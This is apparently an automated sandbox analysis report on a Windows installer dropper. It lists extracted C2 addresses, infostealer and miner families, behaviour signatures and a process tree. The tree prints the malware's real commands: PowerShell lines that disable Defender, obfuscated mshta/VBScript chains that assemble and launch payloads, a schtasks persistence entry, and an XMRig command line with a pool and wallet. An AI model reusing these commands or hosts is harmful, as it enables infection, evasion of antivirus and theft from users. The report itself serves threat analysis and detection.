Analysis
-
max time kernel
727s -
max time network
1812s -
platform
windows11_x64 -
resource
win11 -
submitted
13-11-2021 17:35
General
-
Target
setup_x86_x64_install.exe
-
Size
9.1MB
-
MD5
0ccaba8f07f43baba600ee09864dd488
-
SHA1
fc6205c186b040cd6b2c30e1c4f161ec2eea2a47
-
SHA256
cf878de150bbfc29baab8635e159bb2733e63f1dbd954374258a55ee73982f0a
-
SHA512
3f7602933e91c3b06f44821ae8706b6ab25389dbddeb7f28fc89ba4e84b234ff759ac8b6062fccbf565860302ec59884333115cb22dbedf66bd2bdc77d06db6e
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.hhgenice.top/
Extracted
Family
amadey
Version
2.82
C2
185.215.113.45/g4MbvE/index.php
Extracted
Family
redline
Botnet
media13111
C2
91.121.67.60:51630
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 34 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 43 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 15 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
-
Suspicious use of SetThreadContext 14 IoCs
-
Drops file in Program Files directory 18 IoCs
-
Drops file in Windows directory 38 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 30 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 63 IoCs
-
Kills process with taskkill 8 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 7 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
-
Suspicious behavior: SetClipboardViewer 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16dbfd538b0b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16dbfd538b0b.exeSat16dbfd538b0b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat163af1aa81.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163af1aa81.exeSat163af1aa81.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\5743283.exe"C:\Users\Admin\AppData\Roaming\5743283.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\7008547.exe"C:\Users\Admin\AppData\Roaming\7008547.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\7646913.exe"C:\Users\Admin\AppData\Roaming\7646913.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8412671.exe"C:\Users\Admin\AppData\Roaming\8412671.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6766431.exe"C:\Users\Admin\AppData\Roaming\6766431.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIPT: CLose ( cREaTeobJEcT ( "WscRipT.SHelL" ). rUN ( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Roaming\6766431.exe"" ..\UpJnOk3Yn_BZ21.EXe &&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF """"== """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\6766431.exe"" ) do taskkill /F /IM ""%~nXm"" " , 0 , TRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Roaming\6766431.exe" ..\UpJnOk3Yn_BZ21.EXe &&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""== "" for %m IN ( "C:\Users\Admin\AppData\Roaming\6766431.exe" ) do taskkill /F /IM "%~nXm"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM "6766431.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\7933285.exe"C:\Users\Admin\AppData\Roaming\7933285.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7040 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5048 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\jingli-game.exe"C:\Users\Admin\AppData\Local\Temp\jingli-game.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2609⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat162b769f285d4a78.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat162b769f285d4a78.exeSat162b769f285d4a78.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6836899.exe"C:\Users\Admin\AppData\Roaming\6836899.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\856814.exe"C:\Users\Admin\AppData\Roaming\856814.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\7690304.exe"C:\Users\Admin\AppData\Roaming\7690304.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\5377420.exe"C:\Users\Admin\AppData\Roaming\5377420.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4172725.exe"C:\Users\Admin\AppData\Roaming\4172725.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8379179.exe"C:\Users\Admin\AppData\Roaming\8379179.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\859422.exe"C:\Users\Admin\AppData\Roaming\859422.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIPT: CLose ( cREaTeobJEcT ( "WscRipT.SHelL" ). rUN ( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Roaming\859422.exe"" ..\UpJnOk3Yn_BZ21.EXe &&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF """"== """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\859422.exe"" ) do taskkill /F /IM ""%~nXm"" " , 0 , TRue ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Roaming\859422.exe" ..\UpJnOk3Yn_BZ21.EXe &&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""== "" for %m IN ( "C:\Users\Admin\AppData\Roaming\859422.exe" ) do taskkill /F /IM "%~nXm"8⤵
-
C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E59⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIPT: CLose ( cREaTeobJEcT ( "WscRipT.SHelL" ). rUN ( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe"" ..\UpJnOk3Yn_BZ21.EXe &&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""/p046ZeOV5fN93E5 ""== """" for %m IN ( ""C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe"" ) do taskkill /F /IM ""%~nXm"" " , 0 , TRue ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe" ..\UpJnOk3Yn_BZ21.EXe &&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF "/p046ZeOV5fN93E5 "== "" for %m IN ( "C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe" ) do taskkill /F /IM "%~nXm"11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRiPt: cLoSE ( crEaTeobjECt ("wsCriPt.shElL" ).Run ( "cMD /q /R eCHo | set /P = ""MZ"" > 1U6QCJ.0ZQ & coPy /Y /B 1U6QcJ.0ZQ + ~M8QTK6.LG +2RWpCG7b.N + QDVQ.nb + NTzZxd.SX ..\5UJAEP._~0 & DeL /Q *& STaRT control.exe ..\5UJAEP._~0 " , 0 , tRUe ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R eCHo | set /P = "MZ" > 1U6QCJ.0ZQ &coPy /Y /B 1U6QcJ.0ZQ + ~M8QTK6.LG+2RWpCG7b.N + QDVQ.nb + NTzZxd.SX ..\5UJAEP._~0 & DeL /Q *& STaRT control.exe ..\5UJAEP._~011⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1U6QCJ.0ZQ"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "12⤵
-
C:\Windows\SysWOW64\control.execontrol.exe ..\5UJAEP._~012⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\5UJAEP._~013⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\5UJAEP._~014⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\5UJAEP._~015⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM "859422.exe"9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16862c2e159d0a4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exeSat16862c2e159d0a4.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt: cLosE ( CReATeObJEcT ("WsCripT.sHELl" ).RUN ( "CmD /r copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe"" ..\TyIOGZL_DGrJm.EXe && sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE & IF """" == """" for %t iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe"" ) do taskkill -iM ""%~nxt"" /f" , 0 , tRUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe" ..\TyIOGZL_DGrJm.EXe && sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE& IF "" == "" for %t iN ( "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe" ) do taskkill -iM "%~nxt" /f7⤵
-
C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt: cLosE ( CReATeObJEcT ("WsCripT.sHELl" ).RUN ( "CmD /r copy /Y ""C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe"" ..\TyIOGZL_DGrJm.EXe && sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE & IF ""/pndRQSTDuB4kW8vOCUOVSE"" == """" for %t iN ( ""C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe"" ) do taskkill -iM ""%~nxt"" /f" , 0 , tRUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r copy /Y "C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe" ..\TyIOGZL_DGrJm.EXe && sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE& IF "/pndRQSTDuB4kW8vOCUOVSE" == "" for %t iN ( "C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe" ) do taskkill -iM "%~nxt" /f10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT: CLose ( CreATeobJeCt ( "WsCrIpt.SHELL" ). run ( "CMd /r ecHO M4%raNdom%Dh> _nV2ETiC.R5 & ECHO | set /P = ""MZ"" > qDz2EUwL.Nn & COpy /b /Y QDz2EUwL.NN + Wz3EN0Ra.r + YAwLKSHG.Nt + 1LRWb.UIm + MmIK6j.ACI +_nV2ETiC.R5 ..\XHtD~USv.J & staRt control ..\xHTD~USV.J & del /Q * " , 0 , True ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r ecHO M4%raNdom%Dh> _nV2ETiC.R5 & ECHO | set /P = "MZ" > qDz2EUwL.Nn & COpy /b /Y QDz2EUwL.NN + Wz3EN0Ra.r + YAwLKSHG.Nt + 1LRWb.UIm + MmIK6j.ACI +_nV2ETiC.R5 ..\XHtD~USv.J & staRt control ..\xHTD~USV.J & del /Q *10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>qDz2EUwL.Nn"11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO "11⤵
-
C:\Windows\SysWOW64\control.execontrol ..\xHTD~USV.J11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\xHTD~USV.J12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\xHTD~USV.J13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Sat16862c2e159d0a4.exe" /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat169c60f22b8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exeSat169c60f22b8.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-7O1B4.tmp\Sat169c60f22b8.tmp"C:\Users\Admin\AppData\Local\Temp\is-7O1B4.tmp\Sat169c60f22b8.tmp" /SL5="$20168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe"C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe" /SILENT7⤵
- Executes dropped EXE
-
